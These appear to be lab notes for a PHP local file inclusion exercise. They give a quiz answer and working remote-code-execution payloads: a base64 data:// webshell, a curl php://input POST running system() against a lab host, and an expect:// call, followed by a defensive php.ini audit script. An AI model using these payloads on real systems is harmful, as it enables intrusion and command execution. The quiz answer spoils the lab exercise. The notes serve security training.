Questions
Using the file inclusion find the name of a user on the system that starts with "b".
barry
Submit the contents of the flag.txt file located in the /usr/share/flags directory.
The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt
File Disclosure via PHP filters
Check the PHP configuration at /etc/php/X.Y/apache2/php.ini for Apache or /etc/php/X.Y/fpm/php.ini for Nginx.
RCE with allow_url_include On:
Data Wrapper method:
Payload: data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
In Burp Suite, enter the payload in the LFI parameter lang.
Input method:
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://159.65.95.114:31474/index.php?language=php://input&cmd=id" | grep uid
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Expect method:
After retrieving the php.ini source, grep it for expect:
extension=expect
curl -s "http://159.65.95.114:31474/index.php?language=expect://id"
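From the defender's side, the same php.ini check can be scripted to flag the two settings these methods depend on. This is an added example, not part of the original notes; the sample php.ini text and the function names parse_php_ini and audit_php_ini are constructed for illustration.

```python
import re

TRUE_VALUES = {"1", "on", "yes", "true"}  # php.ini boolean "true" spellings

# Constructed sample php.ini (not taken from the page or any real host).
SAMPLE_INI = """\
[PHP]
; allow_url_include = On   (commented out, must be ignored)
allow_url_fopen = On
allow_url_include = Off
extension=mysqli
allow_url_include = "On"  ; a later assignment overrides the earlier one
;extension=expect
extension=expect.so
"""


def parse_php_ini(text):
    """Return (directives, extensions); the last assignment of a key wins."""
    directives, extensions = {}, set()
    for raw in text.splitlines():
        # ';' starts a comment. Simplification: ';' inside quoted values is
        # not handled, which does not matter for the directives checked here.
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        key, value = key.lower(), value.strip("\"'")
        if key == "extension":
            # Normalise "/path/expect.so" or "php_expect.dll" to "expect".
            name = value.replace("\\", "/").rsplit("/", 1)[-1]
            extensions.add(re.sub(r"^php_|\.(so|dll)$", "", name, flags=re.I).lower())
        else:
            directives[key] = value
    return directives, extensions


def audit_php_ini(text):
    """Return the settings that enable the wrapper methods in these notes."""
    directives, extensions = parse_php_ini(text)
    findings = []
    if directives.get("allow_url_include", "0").lower() in TRUE_VALUES:
        findings.append("allow_url_include=On (data:// and php://input usable in include)")
    if "expect" in extensions:
        findings.append("extension=expect loaded (expect:// usable)")
    return findings


if __name__ == "__main__":
    for finding in audit_php_ini(SAMPLE_INI):
        print("RISK:", finding)
```

An empty result means neither setting is active in that file; run it against both the apache2 and fpm php.ini paths, since each SAPI reads its own copy.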